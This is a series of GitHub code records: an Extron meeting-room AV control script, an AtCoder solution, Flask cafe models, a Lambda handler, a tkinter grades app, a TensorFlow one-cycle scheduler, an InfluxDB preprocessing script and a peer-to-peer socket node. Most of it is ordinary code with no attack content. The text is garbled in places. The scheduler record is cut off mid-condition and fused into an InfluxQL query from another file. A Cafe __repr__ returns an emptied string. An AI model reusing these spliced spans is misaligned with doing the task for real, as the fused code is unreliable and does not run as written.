CISCO.Set('CameraPresetPositionRecallSX20', '5')\n print('Recall Local Preset Cisco: %s' % '5')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '5')\n print('Save Local Preset Cisco: %s' % '5')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '5')\n print('Recall Remote Preset Cisco: %s' % '5')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '5')\n print('Save Remote Preset Cisco: %s' % '5')\n #--\n elif button is BTN['VCRecall'] and state == 'Pressed':\n CISCO_DATA['PresetMode'] = 'Recall'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCRecall'])\n print('Button Pressed - Cisco: %s' % 'Recall')\n #--\n elif button is BTN['VCSave'] and state == 'Pressed':\n CISCO_DATA['PresetMode'] = 'Save'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCSave'])\n print('Button Pressed - Cisco: %s' % 'Save')\n pass\n\n## PAGE Webex ------------------------------------------------------------------\n@event(BTNPAGE['Webex'], BTNSTATE['List'])\ndef webex_events(button, state):\n \"\"\"User Actions: Touch Webex Page\"\"\"\n if button is BTN['WHDMI'] and state == 'Pressed':\n ## HDMI to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'HDMI')\n\n elif button is BTN['WVGA'] and state == 'Pressed':\n ## VGA to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'VGA')\n\n elif 
button is BTN['WPTZ'] and state == 'Pressed':\n ## PTZ to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'PTZ')\n\n elif button is BTN['WShare'] and state == 'Pressed':\n ## ShareLink to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'ShareLink')\n\n elif button is BTN['WCisco1'] and state == 'Pressed':\n ## Cisco 1 to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'5', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'Cisco 1')\n\n elif button is BTN['WCisco2'] and state == 'Pressed':\n ## Cisco 2 to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'6', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'Cisco 2')\n pass\n\n## PAGE VoIP -------------------------------------------------------------------\n@event(BTNPAGE['TelCall'], BTNSTATE['List'])\ndef vi_call_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n if button is BTN['Call'] and state == 'Pressed':\n ##--This button dial the number typed on the touch panel (Biamp VoIP)\n BIAMP.Set('VoIPHook', 'Dial',\n {'Instance Tag':'Dialer', 'Line':'1', 'Call Appearance':'1', \\\n 'Number':VOIP_DATA['Dial']})\n print('Button Pressed - VoIP: %s' % 'Call')\n #--\n elif button is BTN['Hangup'] and state == 'Pressed':\n ##--This button hangs up all active calls (Biamp VoIP)\n BIAMP.Set('VoIPHook', 'End',\n {'Instance Tag':'Dialer', 'Line':'1', 'Call Appearance':'1'})\n print('Button Pressed - VoIP: %s' % 'Hangup')\n pass\n\n## This function is called when the user press a Dial Button\n## This function add or remove data from the panel Dial Number\ndef dialer_voip(btn_name):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n global dialerVI\n\n if btn_name == 'Delete': #If the user push 'Delete' button\n dialerVI = dialerVI[:-1] #Remove the last char of the string\n VOIP_DATA['Dial'] = dialerVI #Asign the string to the data dictionary\n LBL['Dial'].SetText(dialerVI) #Send the string to GUI Label\n\n else: #If the user push a [*#0-9] button\n number = str(btn_name[4]) #Extract the valid character of BTN name\n if VOIP_DATA['DTMF'] == False: #If the DTMF is off\n dialerVI += number #Append the last char to the string\n VOIP_DATA['Dial'] = dialerVI #Asign the string to the data dictionary\n LBL['Dial'].SetText(dialerVI) #Send the string to GUI Label\n elif VOIP_DATA['DTMF'] == True: #If DTMF is On\n BIAMP.Set('DTMF', number, {'Instance Tag':'Dialer', 'Line':'1'})\n pass\n\n@event(BTNPAGE['TelDial'], BTNSTATE['List'])\ndef vi_dial_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n ## All the VoIP Dial Buttons pressed come in button variable\n if state == 'Pressed' or state == 'Repeated':\n print('Button Pressed - VoIP: %s' % button.Name)\n dialer_voip(button.Name) #Recall a validation function\n button.SetState(1)\n else:\n button.SetState(0)\n pass\n\n@event(BTNPAGE['TelOpt'], BTNSTATE['List'])\ndef vi_opt_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n ## VoIP Redial Control\n if button is BTN['Redial'] and state == 'Pressed':\n BIAMP.Set('VoIPHook', 'Redial', {'Instance Tag':'Dialer', \\\n 'Line':'1', 'Call Appearance':'1'})\n print('Button Pressed - VoIP: %s' % 'Redial')\n\n ## VoIP DTMF Control\n elif button is BTN['DTMF'] and state == 'Pressed':\n if VOIP_DATA['DTMF'] == False:\n 
VOIP_DATA['DTMF'] = True\n            BTN['DTMF'].SetState(1)\n            print('Button Pressed - VoIP: %s' % 'DTMF On')\n        #--\n        elif VOIP_DATA['DTMF'] == True:\n            VOIP_DATA['DTMF'] = False\n            BTN['DTMF'].SetState(0)\n            print('Button Pressed - VoIP: %s' % 'DTMF Off')\n        print('Button Pressed - VoIP: %s' % 'DTMF')\n\n    ## Hold / Resume Control\n    elif button is BTN['Hold'] and state == 'Pressed':\n        print('Button Pressed - VoIP: %s' % 'Hold/Resume')\n    pass\n\n## PAGE Audio ------------------------------------------------------------------\n@event(BTNPAGE['Audio1'], BTNSTATE['List'])\ndef audio_source_events(button, state):\n    \"\"\"User Actions: Touch Audio Page\"\"\"\n\n    if button is BTN['XHDMI'] and state == 'Pressed':\n        ## HDMI to HDMI Audio Dembedder Input - Audio\n        MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'1', 'Tie Type':'Audio'})\n        print('Button Pressed - Audio: %s' % 'HDMI')\n\n    elif button is BTN['XVGA'] and state == 'Pressed':\n        ## VGA to HDMI Audio Dembedder Input - Audio\n        MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'1', 'Tie Type':'Audio'})\n        print('Button Pressed - Audio: %s' % 'VGA')\n\n    elif button is BTN['XShare'] and state == 'Pressed':\n        ## ShareLink to HDMI Audio Dembedder Input - Audio\n        MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'1', 'Tie Type':'Audio'})\n        print('Button Pressed - Audio: %s' % 'ShareLink')\n    pass\n\n@event(BTNPAGE['Audio2'], BTNSTATE['List'])\ndef audio_vol_events(button, state):\n    \"\"\"User Actions: Touch Audio Page\"\"\"\n\n    ## Data of current Biamp Block Gain\n    global CURRENTLVL1\n    global CURRENTLVL2\n    CURRENTLVL1 = BIAMP_DATA['lvl_spk']\n    CURRENTLVL2 = CISCO_DATA['Volume']\n\n    ## Audio Speaker: Vol -\n    if button is BTN['XSpkLess']:\n        if state == 'Pressed' or state == 'Repeated':\n            CURRENTLVL1 -= 5 ## Decrease 5 dB\n            if CURRENTLVL1 < -100:\n                print('Biamp minimum gain')\n            else:\n                BIAMP.Set('LevelControl', CURRENTLVL1, {'Instance Tag':'lvl_spk', 'Channel':'1'})\n                LVL['Spk'].SetLevel(CURRENTLVL1)\n            BTN['XSpkLess'].SetState(1)\n        else:\n            BTN['XSpkLess'].SetState(0)\n        print('Button Pressed - Audio: %s' % 'Spk-')\n\n    ## Audio Speaker: Vol +\n    elif button is BTN['XSpkPlus']:\n        if state == 'Pressed' or state == 'Repeated':\n            CURRENTLVL1 += 5 ## Increase 5 dB\n            if CURRENTLVL1 > 12:\n                print('Biamp maximum gain')\n            else:\n                BIAMP.Set('LevelControl', CURRENTLVL1, {'Instance Tag':'lvl_spk', 'Channel':'1'})\n                LVL['Spk'].SetLevel(CURRENTLVL1)\n            BTN['XSpkPlus'].SetState(1)\n        else:\n            BTN['XSpkPlus'].SetState(0)\n        print('Button Pressed - Audio: %s' % 'Spk+')\n\n    ## Audio VC Remote: Vol -\n    if button is BTN['XVCLess']:\n        if state == 'Pressed' or state == 'Repeated':\n            CURRENTLVL2 -= 5 ## Decrease 5 dB\n            if CURRENTLVL2 < 0:\n                print('VC minimum gain')\n            else:\n                CISCO.Set('Volume', CURRENTLVL2)\n                LVL['VC'].SetLevel(CURRENTLVL2)\n            BTN['XVCLess'].SetState(1)\n        else:\n            BTN['XVCLess'].SetState(0)\n        print('Button Pressed - Audio: %s' % 'VC-')\n\n    ## Audio VC Remote: Vol +\n    if button is BTN['XVCPlus']:\n        if state == 'Pressed' or state == 'Repeated':\n            CURRENTLVL2 += 5 ## Increase 5 dB\n            if CURRENTLVL2 > 100: ## Cisco volume range is assumed to be 0-100\n                print('VC maximum gain')\n            else:\n                CISCO.Set('Volume', CURRENTLVL2)\n                LVL['VC'].SetLevel(CURRENTLVL2)\n            BTN['XVCPlus'].SetState(1)\n        else:\n            BTN['XVCPlus'].SetState(0)\n        print('Button Pressed - Audio: %s' % 'VC+')\n    pass\n\n@event(BTNPAGE['Audio3'], BTNSTATE['List'])\ndef audio_mute_events(button, state):\n    \"\"\"User Actions: Touch Audio Page\"\"\"\n\n    ## Mute Speaker Audio Control\n    if button is BTN['XSpk'] and state == 'Pressed':\n        if 
BIAMP_DATA['MuteSpk'] == True:\n            BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n        elif BIAMP_DATA['MuteSpk'] == False:\n            BIAMP.Set('MuteControl', 'On', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n        print('Button Pressed - Audio: %s' % 'Mute Spk')\n\n    ## Mute VC Remote Audio Control\n    elif button is BTN['XVC'] and state == 'Pressed':\n        if BIAMP_DATA['MuteVCRx'] == True:\n            BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n        elif BIAMP_DATA['MuteVCRx'] == False:\n            BIAMP.Set('MuteControl', 'On', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n        print('Button Pressed - Audio: %s' % 'Mute VC')\n\n    ## Mute All Mics Audio Control\n    elif button is BTN['XMics'] and state == 'Pressed':\n        if BIAMP_DATA['Mute_Mics'] == True:\n            BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'mute_mix', 'Channel':'1'})\n        elif BIAMP_DATA['Mute_Mics'] == False:\n            BIAMP.Set('MuteControl', 'On', {'Instance Tag':'mute_mix', 'Channel':'1'})\n        print('Button Pressed - Audio: %s' % 'Mute Mics')\n    pass\n\n## Lights PAGE -----------------------------------------------------------------\n@event(BTNPAGE['Lights'], BTNSTATE['List'])\ndef lights_events(button, state):\n    \"\"\"User Actions: Touch Lights Page\"\"\"\n\n    if button is BTN['Escene1'] and state == 'Pressed':\n        ## All Lights Off\n        LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'4'})\n        print('Button Pressed - Lights: %s' % 'Escene 1')\n\n    elif button is BTN['Escene2'] and state == 'Pressed':\n        ## Black soft Lights\n        LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'3/Lower'})\n        print('Button Pressed - Lights: %s' % 'Escene 2')\n\n    elif button is BTN['Escene3'] and state == 'Pressed':\n        ## White soft Lights\n        LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'2/Raise'})\n        print('Button Pressed - Lights: %s' % 'Escene 3')\n\n    elif button is BTN['Escene4'] and state == 'Pressed':\n        ## All Lights On\n        LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'1'})\n        print('Button Pressed - Lights: %s' % 'Escene 4')\n\n    ## Mutually Exclusive\n    BTNGROUP['Lights'].SetCurrent(button)\n    pass\n\n## Blinds PAGE -----------------------------------------------------------------\n@event(BTNPAGE['Blinds'], BTNSTATE['List'])\ndef blinds_events(button, state):\n    \"\"\"User Actions: Touch Blinds Page\"\"\"\n\n    if button is BTN['BlindsUp'] and (state == 'Pressed' or state == 'Repeated'):\n        ## Blinds Up\n        #SOMFY.Set('Tilt', 'Up', {'Channel':'1', 'Amplitude':1})\n        print('Button Pressed - Blinds: %s' % 'Blinds Up')\n\n    elif button is BTN['BlindsSt'] and state == 'Pressed':\n        ## Blinds Stop\n        #SOMFY.Set('Position', 'Stop', {'Channel':'1'})\n        print('Button Pressed - Blinds: %s' % 'Blinds Stop')\n\n    elif button is BTN['BlindsDw'] and (state == 'Pressed' or state == 'Repeated'):\n        ## Blinds Down\n        #SOMFY.Set('Tilt', 'Down', {'Channel':'1', 'Amplitude':1})\n        print('Button Pressed - Blinds: %s' % 'Blinds Down')\n\n    ## Mutually Exclusive\n    BTNGROUP['Blinds'].SetCurrent(button)\n    pass\n\n## Status PAGE -----------------------------------------------------------------\n\n## Power PAGE ------------------------------------------------------------------\n@event(BTN['PowerAll'], BTNSTATE['List'])\ndef power_events(button, state):\n    \"\"\"User Actions: Touch PowerOff Page\"\"\"\n\n    global PWRCOUNT\n    ## If the user presses the Power button:\n    ## Only turn on 
the first visual state of the button - it does not trigger any action\n    if state == 'Pressed':\n        BTN['PowerAll'].SetState(4)\n        print('Button Pressed: %s' % 'PowerAll')\n\n    ## If the user holds down the button:\n    ## A counter is decremented from 4 to 0\n    ## Each new value turns on the next visual state of the Power button\n    ## When the value reaches 0, shut down all devices in the system\n    elif state == 'Repeated':\n        PWRCOUNT = PWRCOUNT - 1\n        BTN['PowerAll'].SetState(PWRCOUNT)\n        LBL['CountAll'].SetText(str(PWRCOUNT))\n        print('Button Repeated: %s' % 'PowerAll')\n        ## SHUTDOWN ALL DEVICES\n        if PWRCOUNT == 0:\n            TLP.ShowPage(PAGE['Index'])\n\n    ## If the user releases the button:\n    ## Clear the power counter in the GUI and remove the visual feedback\n    elif state == 'Released':\n        PWRCOUNT = 4\n        BTN['PowerAll'].SetState(0)\n        LBL['CountAll'].SetText('')\n        print('Button Released: %s' % 'PowerAll')\n    pass\n\n## End Events Definitions-------------------------------------------------------\ninitialize()\n","repo_name":"dyanko14/ACT_HQ_MeetingRoom","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":60999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
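The control script above repeats one pattern per device: a Connected/Disconnected event either subscribes-and-updates, or schedules another connection attempt. A device-agnostic sketch of that reconnect loop, with threading.Timer standing in for extronlib's Wait (extronlib only exists on Extron hardware, so this is an analogue, not the real API):

import threading

class Reconnector:
    """Mirror of the trying_* / Wait(5, ...) pairs in the record above."""

    def __init__(self, device, interval=5.0):
        self.device = device      # assumed to expose Connect(timeout)
        self.connected = False
        self.interval = interval

    def on_event(self, state):
        # Called from the device's 'Connected'/'Disconnected' event handler.
        self.connected = (state == 'Connected')
        if not self.connected:
            self._retry()

    def _retry(self):
        if not self.connected:
            print('Trying to reconnect...')
            self.device.Connect(4)  # 4-second attempt, as in the original
            threading.Timer(self.interval, self._retry).start()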
+{"seq_id":"25751998840","text":"import collections, math, bisect, heapq, random, functools, itertools, copy, typing\nimport platform; LOCAL = (platform.uname().node == 'AMO')\n\n\nimport sys; input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\ninp = lambda f=int: list(map(f, input().split()))\n\ndef make_arr(*args):\n def func(x):\n if len(args) == 1: return [x() for _ in range(args[0])]\n return [make_arr(*args[1:])(x) for _ in range(args[0])]\n return func\n\ndef debug(*args):\n if LOCAL:\n print('\\033[92m', end='')\n printf(*args)\n print('\\033[0m', end='')\n\ndef printf(*args):\n if LOCAL:\n print('>>>: ', end='')\n for arg in args:\n if isinstance(arg, typing.Iterable) and \\\n not isinstance(arg, str) and \\\n not isinstance(arg, dict):\n print(' '.join(map(str, arg)), end=' ')\n else:\n print(arg, end=' ')\n print()\n\n# avaliable on Google, AtCoder\n# sys.setrecursionlimit(10**6)\n# import numpy as np\n# import scipy\n\n# d4 = [(1,0),(0,1),(-1,0),(0,-1)]\n# d8 = [(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)]\n# d6 = [(2,0),(1,1),(-1,1),(-2,0),(-1,-1),(1,-1)] # hexagonal layout\n\ndef solve(cas):\n n, m = inp()\n G = [[] for _ in range(n+1)]\n for _ in range(m):\n a, b, x, y = inp()\n G[a].append((b, x, y))\n G[b].append((a, -x, -y))\n \n pos = [None] * (n+1)\n pos[1] = (0, 0)\n def bfs():\n q = collections.deque([1])\n while q:\n u = q.popleft()\n for v, x, y in G[u]:\n if pos[v] == None:\n pos[v] = (pos[u][0] + x, pos[u][1] + y)\n q.append(v)\n else:\n if pos[v] != 'undecidable':\n if pos[v][0] != pos[u][0] + x or pos[v][1] != pos[u][1] + y:\n pos[v] = 'undecidable'\n \n \n bfs()\n for i in range(1, n+1):\n if pos[i] is None:\n print('undecidable')\n else:\n printf(pos[i])\n \n\ncas = 1\nfor _ in range(cas):\n solve(_)\n\n","repo_name":"amomorning/online-challenges","sub_path":"atcoder/abc320/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"34804790504","text":"\"\"\"Data models for Flask Cafe\"\"\"\n\n\nfrom flask_bcrypt import Bcrypt\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nbcrypt = Bcrypt()\ndb = SQLAlchemy()\n\nDEFAULT_IMG_URL = \"/static/images/default-pic.png\"\n\n\nclass User(db.Model):\n \"\"\"A user.\"\"\"\n\n __tablename__ = \"users\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n\n username = db.Column(db.String(25), nullable=False, unique=True)\n\n admin = db.Column(db.Boolean, nullable=False, default=False)\n\n email = db.Column(\n db.String(50),\n nullable=False,\n )\n\n first_name = db.Column(\n db.String(25),\n nullable=False,\n )\n\n last_name = db.Column(\n db.String(25),\n nullable=False,\n )\n\n description = db.Column(\n db.Text,\n nullable=False,\n )\n\n image_url = db.Column(\n db.Text,\n nullable=False,\n default=DEFAULT_IMG_URL,\n )\n\n password = db.Column(db.Text, nullable=False)\n\n def get_full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n @classmethod\n def register(\n cls,\n username,\n password,\n description,\n first_name,\n last_name,\n email,\n image_url=DEFAULT_IMG_URL,\n admin=False,\n ):\n \"\"\"Sign up user.\n\n Hashes password and adds user to system.\n \"\"\"\n\n hashed_pwd = bcrypt.generate_password_hash(password).decode(\"UTF-8\")\n user = User(\n username=username,\n password=hashed_pwd,\n first_name=first_name,\n last_name=last_name,\n email=email,\n image_url=image_url,\n description=description,\n admin=admin,\n )\n db.session.add(user)\n return user\n\n @classmethod\n def authenticate(cls, username, password):\n \"\"\"Find user with `username` and `password`.\n\n This is a class method (call it on the class, not an individual user.)\n It searches for a user whose password hash matches this password\n and, if it finds such a user, returns that user object.\n\n If this can't find matching user (or if password is wrong), returns\n False.\n \"\"\"\n\n user = cls.query.filter_by(username=username).first()\n\n if user:\n is_auth = bcrypt.check_password_hash(user.password, password)\n if is_auth:\n return user\n\n return False\n\n\nclass City(db.Model):\n \"\"\"Cities for cafes.\"\"\"\n\n __tablename__ = \"cities\"\n\n code = db.Column(\n db.Text,\n primary_key=True,\n )\n\n name = db.Column(\n db.Text,\n nullable=False,\n )\n\n state = db.Column(\n db.String(2),\n nullable=False,\n )\n\n\nclass Cafe(db.Model):\n \"\"\"Cafe information.\"\"\"\n\n __tablename__ = \"cafes\"\n\n id = db.Column(\n db.Integer,\n primary_key=True,\n )\n\n name = db.Column(\n db.Text,\n nullable=False,\n )\n\n description = db.Column(\n db.Text,\n nullable=False,\n )\n\n url = db.Column(\n db.Text,\n nullable=False,\n )\n\n address = db.Column(\n db.Text,\n nullable=False,\n )\n\n city_code = db.Column(\n db.Text,\n db.ForeignKey(\"cities.code\"),\n nullable=False,\n )\n\n image_url = db.Column(\n db.Text,\n nullable=False,\n default=\"/static/images/default-cafe.jpg\",\n )\n\n city = db.relationship(\"City\", backref=\"cafes\")\n\n def __repr__(self):\n return f''\n\n def get_city_state(self):\n \"\"\"Return 'city, state' for cafe.\"\"\"\n\n city = self.city\n return f\"{city.name}, {city.state}\"\n\n\ndef connect_db(app):\n \"\"\"Connect this database to provided Flask app.\n\n You should call this in your Flask app.\n \"\"\"\n\n app.app_context().push()\n db.app = app\n 
db.init_app(app)\n","repo_name":"danielzeljko/flask-cafe","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"23577319535","text":"import json\n\n\ndef hello(event, context):\n data = json.loads(event['body'])\n\n print(type(data))\n print(data)\n\n body = {\n \"type\": type(data).__name__,\n \"data\": data\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n","repo_name":"fbaltor/principia-challenge","sub_path":"api/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6344345547","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport sqlite3\r\n\r\ndef criar_tabela():\r\n conn = sqlite3.connect('escola.db')\r\n c = conn.cursor()\r\n\r\n c.execute('''CREATE TABLE IF NOT EXISTS alunos (\r\n id INTEGER PRIMARY KEY,\r\n nome TEXT,\r\n presencas INTEGER,\r\n faltas INTEGER,\r\n nota1 REAL,\r\n nota2 REAL,\r\n media REAL,\r\n frequencia REAL\r\n )''')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\ndef calcular_situacao(media, frequencia):\r\n if media >= 6.0 and frequencia >= 75:\r\n return \"Aprovado\"\r\n else:\r\n return \"Reprovado\"\r\n\r\ndef adicionar_aluno():\r\n nome = nome_entry.get()\r\n presencas = int(presencas_entry.get())\r\n faltas = int(faltas_entry.get())\r\n nota1 = float(nota1_entry.get())\r\n nota2 = float(nota2_entry.get())\r\n\r\n conn = sqlite3.connect('escola.db')\r\n c = conn.cursor()\r\n\r\n media = (nota1 + nota2) / 2\r\n total_aulas = presencas + faltas\r\n frequencia = (presencas / total_aulas) * 100\r\n\r\n situacao = calcular_situacao(media, frequencia)\r\n\r\n c.execute(\"INSERT INTO alunos (nome, presencas, faltas, nota1, nota2, media, frequencia) VALUES (?, ?, ?, ?, ?, ?, ?)\",\r\n (nome, presencas, faltas, nota1, nota2, media, frequencia))\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n messagebox.showinfo(\"Sucesso\", f\"Aluno {nome} adicionado com sucesso. Situação: {situacao}\")\r\n\r\n# Cria a janela principal\r\nroot = tk.Tk()\r\nroot.title(\"Controle de Alunos\")\r\n\r\n# Cria os widgets da interface\r\nnome_label = tk.Label(root, text=\"Nome:\")\r\nnome_label.pack()\r\nnome_entry = tk.Entry(root)\r\nnome_entry.pack()\r\n\r\npresencas_label = tk.Label(root, text=\"Presenças:\")\r\npresencas_label.pack()\r\npresencas_entry = tk.Entry(root)\r\npresencas_entry.pack()\r\n\r\nfaltas_label = tk.Label(root, text=\"Faltas:\")\r\nfaltas_label.pack()\r\nfaltas_entry = tk.Entry(root)\r\nfaltas_entry.pack()\r\n\r\nnota1_label = tk.Label(root, text=\"Nota 1:\")\r\nnota1_label.pack()\r\nnota1_entry = tk.Entry(root)\r\nnota1_entry.pack()\r\n\r\nnota2_label = tk.Label(root, text=\"Nota 2:\")\r\nnota2_label.pack()\r\nnota2_entry = tk.Entry(root)\r\nnota2_entry.pack()\r\n\r\nadicionar_button = tk.Button(root, text=\"Adicionar Aluno\", command=adicionar_aluno)\r\nadicionar_button.pack()\r\n\r\nif __name__ == \"__main__\":\r\n criar_tabela()\r\n root.mainloop()\r\n","repo_name":"dbcfilho/average_database","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"18378421100","text":"import numpy as np\nimport math\nimport tensorflow.compat.v1 as tf\n\nclass CosineAnnealer:\n\n def __init__(self, start, end, steps):\n self.start = start\n self.end = end\n self.steps = steps\n self.n = 0\n\n def step(self):\n self.n += 1\n cos = tf.math.cos(np.pi * (self.n / self.steps)) + 1\n return self.end + (self.start - self.end) / 2. * cos\n\n def getval(self,step):\n cos = tf.math.cos(np.pi * (step / self.steps)) + 1\n return self.end + (self.start - self.end) / 2. * cos\n\nclass OneCycleScheduler():\n \"\"\"\n From https://www.avanwyk.com/tensorflow-2-super-convergence-with-the-1cycle-policy/, by Andrich van Wyk modified from\n fastai lib. Modified again to apply for TPU code.\n \"\"\"\n\n def __init__(self, lr_max, steps, mom_min=0.85, mom_max=0.95, phase_1_pct=0.45, div_factor=25.):\n super(OneCycleScheduler, self).__init__()\n lr_min = lr_max / div_factor\n final_lr = lr_max / (div_factor * 1e4)\n phase_1_steps = steps * phase_1_pct\n phase_2_steps = steps - phase_1_steps\n\n self.phase_1_steps = phase_1_steps\n self.phase_2_steps = phase_2_steps\n self.phase = 0\n self.step = 0\n\n self.phases = [[CosineAnnealer(lr_min, lr_max, phase_1_steps), CosineAnnealer(mom_max, mom_min, phase_1_steps)],\n [CosineAnnealer(lr_max, final_lr, phase_2_steps),\n CosineAnnealer(mom_min, mom_max, phase_2_steps)]]\n\n self.lrs = []\n self.moms = []\n\n @tf.function\n def getlrmom(self,step):\n if step= {0} - 22d AND time < {0} GROUP BY time(1h)'.format(date)) # Query written in InfluxQL\n points = results.get_points()\n values = results.raw[\"series\"][0][\"values\"]\n columns = results.raw[\"series\"][0][\"columns\"]\n df = pd.DataFrame(values, columns=columns)\n df.index = [parser.parse(d) for d in df[\"time\"].values]\n split_time = df.index[-1]-td(days=1)\n\n train = df.loc[:split_time]\n test = df.loc[split_time+td(seconds=1):]\n train_x, train_y = split_labels(train)\n test_x, test_y = split_labels(test)\n return train_x, train_y, test_x, test_y\n\n\ndef split_labels(df):\n x = df[[\"time\"]].rename(columns={\"time\": \"Time\"})\n y = df[[\"mean\"]].rename(columns={\"mean\": \"Demand\"})\n x.index = list(range(len(x)))\n y.index = list(range(len(y)))\n return x,y\n\n\nif __name__ == \"__main__\":\n train_x, train_y, test_x, test_y = get_train_test(date=\"2020-03-01\")\n print(train_x,train_y) \n\n","repo_name":"NielsOerbaek/caiso-mlflow","sub_path":"prepros.py","file_name":"prepros.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"}
+{"seq_id":"3709630522","text":"import hashlib\nimport ipaddress\nimport json\nimport socket\nimport sys\nimport threading\nimport time\nimport uuid\n\nfrom . import crypto_funcs as cf\n\nmsg_del_time = 30\nPORT = 65432\n\n\nclass NodeConnection(threading.Thread):\n def __init__(self, main_node, sock, id, host, port):\n\n super(NodeConnection, self).__init__()\n\n self.host = host\n self.port = port\n self.main_node = main_node\n self.sock = sock\n self.terminate_flag = threading.Event()\n self.last_ping = time.time()\n # Variable for parsing the incoming json messages\n self.buffer = \"\"\n\n # The id of the connected node\n self.public_key = cf.load_key(id)\n self.id = id\n\n self.main_node.debug_print(\"Connection \" + self.host + \":\" + str(self.port))\n\n def send(self, data):\n try:\n self.sock.sendall(data.encode(\"utf-8\"))\n\n except Exception as e:\n self.main_node.debug_print(\"Exception: \" + str(e))\n self.terminate_flag.set()\n\n def stop(self):\n self.terminate_flag.set()\n\n def run(self):\n self.sock.settimeout(10.0)\n\n while not self.terminate_flag.is_set():\n if time.time() - self.last_ping > self.main_node.dead_time:\n self.terminate_flag.set()\n print(\"node\" + self.id + \" is dead\")\n\n try:\n message = self.sock.recv(4096)\n if message == \"ping\":\n self.last_ping = time.time()\n else:\n self.main_node.node_message(self, message)\n\n except socket.timeout:\n pass\n\n except Exception as e:\n self.terminate_flag.set()\n self.main_node.debug_print(e)\n\n time.sleep(0.01)\n\n self.main_node.node_disconnected(self)\n self.sock.settimeout(None)\n self.sock.close()\n del self.main_node.nodes_connected[self.main_node.nodes_connected.index(self)]\n time.sleep(1)\n\n\nclass Node(threading.Thread):\n def __init__(self, host=\"\", port=65432):\n super(Node, self).__init__()\n\n self.terminate_flag = threading.Event()\n self.pinger = Pinger(self) # start pinger\n self.debug = True\n\n self.dead_time = 45 # time to disconect from node if not pinged, nodes ping after 20s\n\n self.host = host\n self.ip = host # own ip, will be changed by connection later\n self.port = port\n\n self.nodes_connected = []\n\n self.msgs = {} # hashes of recieved messages\n self.peers = []\n\n self.id = uuid.uuid4()\n\n self.max_peers = 10\n\n hostname = socket.gethostname()\n\n self.local_ip = socket.gethostbyname(hostname)\n\n self.banned = []\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.debug_print(\"Initialisation of the Node on port: \" + str(self.port))\n self.sock.bind((self.host, self.port))\n self.sock.settimeout(10.0)\n self.sock.listen(1)\n\n def debug_print(self, msg):\n if self.debug:\n print(\"[debug] \" + str(msg))\n\n def network_send(self, message, exc=[]):\n for i in self.nodes_connected:\n if i.host not in exc:\n i.send(json.dumps(message))\n\n def connect_to(self, 